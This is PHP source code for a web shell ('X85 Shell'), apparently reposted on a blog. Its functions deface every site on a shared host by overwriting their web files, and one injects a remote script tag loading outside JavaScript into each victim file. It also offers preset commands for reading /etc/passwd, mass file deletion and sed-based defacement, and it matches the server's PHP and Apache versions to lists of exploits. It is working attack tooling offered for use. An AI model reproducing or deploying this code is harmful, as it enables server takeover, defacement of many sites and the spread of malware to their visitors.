$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='cut -d: -f1,2,3 /etc/passwd | grep ::';\">Find Users Without Password</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='cat /proc/version /proc/cpuinfo';\">View CPU Information</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='find / -perm -2 -ls';\">Find All Writeable Files & Folders</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='tar -cvf [BackupFileName].tar -c /home/[USER]/domains/[DOMAIN]/public_html/[FOLDER]';\">Create Backup File</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='rm -Rf';\">Run Format Box</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='perl [Perl File]';\">Run Perl Script</a><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='sed -i -e \'s/Owned by Pr0T3cT10n & Hyp3rInj3cT10n/g\' index.*';\">Mass Deface</a><br />\n";
$result .= "</td>\n</tr>\n</table>\n";

return $result;
}

function ViewPHPInfo(){
$result = "<span class=\"PageTitle\">PHP Information</span><br /><br />";
$result .= "Can't run phpinfo function because it blocked by the server.<br />";
$result .= "Building new function...<br /><br />";

if(function_exists("ini_get_all") and is_callable("ini_get_all")){
$result .= "<center>\n<h2>PHP Core</h2>\n<div><table style=\"width:100%;\">\n<tr>\n<th>Directive</th><th>Local Value</th><th>Master Value</th><th>Access</th>\n</tr>\n";

foreach(ini_get_all() as $key=>$each_ini){
$row = "";
$explode = explode(".",$key);
$each_ini['local_value'] = GenerateColors($each_ini['local_value']);
$each_ini['global_value'] = GenerateColors($each_ini['global_value']);

if(isset($explode[1])){
if($explode[0] != $last_module){
$categories .= "</table></div><br /><br />\n";
$categories .= "<div style=\"background-color:#3d0303;\">";
$categories .= "<h2>".$explode[0]."</h2>\n";
$categories .= "<table style=\"width:100%;\">\n";
$categories .= "<tr>\n<th>Directive</th>\n<th>Local Value</th>\n<th>Master Value</th><th>Access</th>\n</tr>\n";
$categories .= "<tr>\n<td>".$explode[1]."</td>\n";
$categories .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
$categories .= "</tr>\n";

$last_module = $explode[0];
}
else{
$categories .= "<tr>\n<td>".$explode[1]."</td>\n";
$categories .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
$categories .= "</tr>\n";
}
}
else{
$row .= "<tr>\n<td>".$key."</td>\n";
$row .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
$row .= "</tr>\n";
}

$result .= $row;
$count++;
}

$result .= "</table><br />";
}

$result .= "<hr /><br /><h2>apache2handler</h2><table cellpadding=\"3\" style=\"width:100%;\">";

if(function_exists("create_connection_status") and is_callable("create_connection_status"))
$result .= "<tr><td>Connection Status </td><td>".create_connection_status()."</td></tr>";

if(function_exists("apache_get_version") and is_callable("apache_get_version"))
$result .= "<tr><td>Apache Version </td><td>".apache_get_version()."</td></tr>";

if(isset($_SERVER['SERVER_ADMIN']))
$result .= "<tr><td>Server Administrator </td><td>".$_SERVER['SERVER_ADMIN']."</td></tr>";

if(isset($_SERVER['SERVER_ADDR']) and isset($_SERVER['SERVER_PORT']))
$result .= "<tr><td>Hostname:Port </td><td>".$_SERVER['SERVER_ADDR'].":".$_SERVER['SERVER_PORT']."</td></tr>";

if(function_exists("apache_get_modules") and is_callable("apache_get_modules")){
$result .= "<tr><td>Loaded Modules </td><td>";

foreach(apache_get_modules() as $module){
if($count_modules == "10")
$result .= "<br />";

$result .= $module;

if($count_modules == count($apache_modules)-1)
$result .= ".";
else
$result .= ", ";

$count_modules++;
}

$result .= "</td></tr></table><br />";
}

$result .= "<hr /><br /><h2>HTTP Headers Information</h2>";
$result .= "<table cellpadding=\"3\" style=\"width:100%;\">";

if(function_exists("apache_request_headers") and is_callable("apache_request_headers")){
$result .= "<tr><th colspan=\"2\">HTTP Request Headers</th></tr>";

foreach (apache_request_headers() as $header => $value)
$result .= "<tr>\n<td>{$header}</td>\n<td>{$value}</td>\n</tr>\n";
}

if(function_exists("apache_response_headers") and is_callable("apache_response_headers")){
$result .= "<tr><th colspan=\"2\">HTTP Response Headers</th></tr>";

foreach (apache_response_headers() as $header => $value)
$result .= "<tr>\n<td>{$header}</td>\n<td>{$value}</td>\n</tr>\n";
}

$result .= "</table><br /><hr /><br /><h2>Variables</h2><table style=\"width:100%;\"><tr><th>Variable</th><th>Value</th></tr>";

foreach($_SERVER as $server_key=>$server_value){
if(is_array($server_value)){
$result .= "<tr>\n<td>_SERVER['".$server_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"";
htmlspecialchars(print_r($server_value,true));
$result .= "\" /></td>\n</tr>\n";
}
else
$result .= "<tr>\n<td>_SERVER['".$server_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"".htmlspecialchars($server_value)."\" /></td>\n</tr>\n";
}

foreach($_ENV as $env_key=>$env_value)
$result .= "<tr>\n<td>_ENV['".$env_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"".htmlspecialchars($env_value)."\" /></td>\n</tr>\n";

$result .= $categories."</table><br /></center>";

return $result;
}

function MassDefacer(){
if(isset($_POST['submit']) && isset($_POST['message'])){
$result .= "defacing..<br>\n";
$myFile = "/etc/virtual/domainowners";
$fh = @fopen($myFile, "r");
$theData = @fread($fh, filesize($myFile));
@fclose($fh);
$thedata = explode("<br />", nl2br($theData));
foreach($thedata as $user){
$path = explode(": ",$user);
$path[1] = "/home/" .$path[1]. "/public_html/";
if(is_dir($path[1])){
foreach(array("htm", "html", "shtml", "css", "php", "js", "txt", "inc") as $extension){
foreach(glob($path[1]. "*." .$extension) as $injectj00){
$fp = @fopen($injectj00, "w");
if(@fputs($fp, $_POST['message']))
$result .= "<font color=\"green\">" .$injectj00. " was injected</font><br>\n";
else
$result .= "<font color=\"white\">failed to inject " .$injectj00. "</font><br>\n";
}
}
}
else
$result .= "<b><font color=\"white\">" .$path[1]. " is not available!</font></b><br>\n";
}
}
else{
$result = "<span class=\"PageTitle\">Mass Defacer</span><br /><br />";
$result .= "<form method=\"post\" action=\"?act=mass\">\nMessage: (You can use HTML)<br />\n";
$result .= "<textarea rows=\"5\" cols=\"50\" id=\"message\" name=\"message\">".htmlspecialchars($deface)."</textarea><br />";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Start\" /></form><br /><br /><small>Built By L[s]D</small>";
}

return $result;

}

function BotCode(){
if(isset($_POST['submit'])){
$result .= "injecting..<br>\n";
$myFile = "/etc/virtual/domainowners";
$fh = @fopen($myFile, "r");
$theData = @fread($fh, filesize($myFile));
@fclose($fh);
$thedata = explode("\n", $theData);
foreach($thedata as $user){
$path = explode(": ",$user);
$path[1] = "/home/" .$path[1]. "/domains/".$path[0]."/public_html/".$_POST['dir_to_inject']."/";
if(is_dir($path[1])){
foreach(array("htm", "html", "shtml", "css", "php", "js", "txt", "inc") as $extension){
foreach(glob($path[1]. "*." .$extension) as $injectj00){
$fp = @fopen($injectj00, "a+");
if(@fputs($fp, "<? if(\$_REQUEST['CODE']==\"\") echo \"<script src='http://www.planetnana.co.il/shin271/_uacct.js'></script>\"; ?>"))
$result .= "<font color=\"green\">" .$injectj00. " was injected</font><br>\n";
else
$result .= "<font color=\"white\">failed to inject " .$injectj00. "</font><br>\n";
}
}
}
else
$result .= "<b><font color=\"white\">" .$path[1]. " is not available!</font></b><br>\n";
}
}
else{
$result = "<span class=\"PageTitle\">Bot Code Injection</span><br /><br />";
$result .= "<form method=\"post\" action=\"?act=bot\">\nInject To Dir<br />\n";
$result .= "<input type=\"text\" name=\"dir_to_inject\" value=\"".htmlspecialchars($dir_to_inject)."\"><small> eg. forum <b>or</b> ipb</small><br />";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Start\" /></form><br /><br /><small>Built By L[s]D</small>";
}

return $result;

}

function UHNav(){
$myFile = "/etc/virtual/domainowners";
$fh = @fopen($myFile, "r");
$theData = @fread($fh, filesize($myFile));
@fclose($fh);
$thedata = explode("\n", $theData);
foreach($thedata as $user){
$path = explode(": ",$user);
$result .= "<a href=\"?act=list&dir=/home/".$path[1]."/domains/".$path[0]."/public_html/\">".$path[1]."</a> <br />";
}
return $result;
}

function ViewPHPBugs(){
$ver = $this->phpv;
$result = "<span class=\"PageTitle\">View PHP Bugs</span><br /><br />";

$version["5.2.4"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP 5.2.4 ionCube extension safe_mode / disable_functions Bypass"
);
$version["5.2.3"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability",
"PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",
"PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit",
"PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)",
"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",
"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",
"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit",
"PHP 5.2.3 glob() Denial of Service Exploit",
"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",
"PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit"
);
$version["5.2.1"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",
"PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",
"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",
"PHP 5.2.1 unserialize() Local Information Leak Exploit",
"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",
"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",
"PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",
"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",
"PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",
"PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit",
"PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak",
"PHP <= 5.2.1 substr_compare() Information Leak Exploit",
"5.2.1 WDDX Session Deserialization Information Leak",
"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit"
);
$version["5.2.0"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)",
"PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)",
"PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)",
"PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 zip:// URL Wrapper BoF Exploit",
"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",
"PHP 5.2.0 ext/filter Space Trimming Buffer Underflow Exploit (MacOSX)",
"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit"
);
$version["4.4.7"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability"
);
$version["4.4.6"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",
"PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",
"PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",
"PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit",
"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",
"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",
"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",
"PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC"
);
$version["4.3.7"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak"
);
$version["4.4.5"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",
"PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",
"PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",
"PHP < 4.4.5 / 5.2.1 WDDX Session Deserialization Information Leak",
"PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak",
"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",
"PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",
"PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit"
);
$version["4.4.4"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC", "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit", "PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass", "PHP <= 4.4.4 / 5.1.6 htmlentities() Local Buffer Overflow PoC",
"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",
"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability");
$version["4.4.3"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC",
"PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",
"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability"
);
$version["4.4.0"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit"
);
$version["4.3.7"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP <= 4.3.7 / 5.0.0RC3 memory_limit Remote Exploit",
"PHP <= 4.3.7 openlog() Buffer Overflow Exploit"
);
$version["3.0.16"] = array(
"PHP (php-exec-dir) Patch Command Access Restriction Bypass",
"PHP wddx_deserialize() String Append Crash Exploit",
"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
"PHP mSQL (msql_connect) Local Buffer Overflow PoC",
"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
"PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
"PHP Perl Extension Safe_mode Bypass Exploit",
"PHP 5.x COM functions safe_mode and disable_function bypass",
"PHP 3.0.16 / 4.0.2 Remote Format Overflow Exploit"
);

if(isset($version[$ver]))
foreach($version[$ver] as $vuln)
$result .= "<a href=\"http://milw0rm.com/search.php?dong=" .$vuln. "\" target=\"_blank\">" .$vuln. "</a><br />\n";
else
$result .= "There is no information in the shell database about this php version.<br />";
$result .= "<br />";
return $result;
}

function ViewApacheBugs(){
$starttext = "<span class=\"PageTitle\">View Apache Bugs</span><br /><br />";
$result = $starttext;
$ver = @apache_get_version();

$version["2.2.3"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache HTTP Server 2.x Memory Leak Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)"
);
$version["2.0.59"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache HTTP Server 2.x Memory Leak Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC"
);
$version["2.0.58"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache HTTP Server 2.x Memory Leak Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)"
);
$version["2.0.52"] = array(
"Apache <= 2.0.52 HTTP GET request Denial of Service Exploit",
"Apache 2.0.52 Multiple Space Header Denial of Service Exploit (v2)",
"Apache 2.0.52 Multiple Space Header DoS (Perl code)",
"Apache 2.0.52 Multiple Space Header DoS (c code)"
);
$version["2.0.48"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit"
);
$version["2.0.45"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache HTTP Server 2.x Memory Leak Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl"
);
$version["2.0.44"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache HTTP Server 2.x Memory Leak Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache <= 2.0.44 Linux Remote Denial of Service Exploit"
);
$version["1.3.37"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",
"Apache 1.3.x mod_mylo Remote Code Execution Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC"
);
$version["1.3.34"] = array(
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit"
);
$version["1.3.33"] = array(
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit"
);
$version["1.3.31"] = array(
"Apache HTTPd Arbitrary Long HTTP Headers DoS",
"Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",
"Apache 1.3.x mod_mylo Remote Code Execution Exploit",
"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit"
);

foreach($version as $vuln_version => $vulns)
if(strstr($ver, $vuln_version))
foreach($vulns as $vuln)
$result.= "<a href=\"http://milw0rm.com/search.php?dong=" .$vuln. "\">" .$vuln. "</a><br />\n";

if($result == $starttext)
$result .= "There is no information in the shell database about this apache version.<br />";

$result .= "<br />";
return $result;
}

}

function GenerateColors($value){
if(strlen($value) <= 0){ //No Value?
$value = "<em style=\"color:gray;\">no value</em>\n";
}
else{
if($value == "1"){ //Enabled?
$value = "<span style=\"color:green;\">enabled</span>\n";
}
else if($value == "0"){ //Disabled?
$value = "<span style=\"color:red;\">disabled</span>\n";
}
else if($value == "-1"){ //Unlimited?
$value = "<span style=\"color:orange;\">unlimited</span>\n";
}
}

//Colors in value?
$value = preg_replace("/(#.+)(\S)/i","<span style=\"color:\\1\\2;\">\\1\\2</span>\n",$value);

//& => & (Valid XHTML)
$value = str_replace("&","&",$value);

return $value;
}
?>

X85 Shell

Minggu, 17 Juni 2012 | komentar

Posting Komentar

Advertisement

Data

Popular post

Arsip Blog

Top Software